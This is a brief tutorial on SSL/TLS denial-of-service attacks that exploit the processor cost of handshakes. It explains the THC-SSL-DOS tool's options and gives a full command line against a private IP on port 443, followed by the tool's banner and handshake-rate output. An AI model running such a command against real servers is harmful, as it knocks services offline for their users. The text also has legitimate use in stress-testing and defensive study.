DOS Attacks on SSL Service

Important information (such as e-mail address, credit card information, ID number, username and password) must be transmitted encrypted during transmission. HTTP is a clear-text protocol and can be configured as HTTPS, protected by SSL/TLS. Cryptography algorithms can provide a certain level of protection depending on the strength of the algorithm.

Secure Sockets Layer (SSL) protocol is a protocol that provides secure data communication over the internet. Nowadays, it is mostly preferred in online banking transactions, social networks and e-mail servers.

A normal SSL connection established without any manipulation requires an average of 15 times more processor power than a standard HTTP connection. As a result of this situation, the server will need more resources as it will have more work to do. The THC-SSL-DOS tool developed based on this situation measures the performance of the server in responding to SSL requests with the traffic it creates between the client and the server. If it cannot respond, it will be out of service and the system will appear down. In the screenshot below, a visual of the anatomy of the attack is given.

For this purpose thc-ssl-dos is a powerful tool that is in general, the use of the THC-SSL-DOS tool is as follows.

-l 100: Specifies the number of connections to be opened.

192.168.10.12: Destination IP address

443 : SSL Port

root@hostb# thc-ssl-dos -l 100 192.168.100.12 443 --accept

Greetingz: the french underground

Waiting for script kiddies to piss off............

The force is with those who read the source...

Handshakes 0 [0.00 h/s], 1 Conn, 0 Err

Handshakes 2 [2.90 h/s], 6 Conn, 0 Err

Handshakes 25 [22.42 h/s], 13 Conn, 0 Err

Handshakes 70 [43.97 h/s], 20 Conn, 0 Err

Handshakes 125 [56.51 h/s], 27 Conn, 0 Err

Handshakes 185 [62.09 h/s], 33 Conn, 0 Err

Handshakes 262 [74.56 h/s], 41 Conn, 0 Err

Handshakes 365 [104.93 h/s], 47 Conn, 0 Err

Handshakes 496 [131.23 h/s], 54 Conn, 0 Err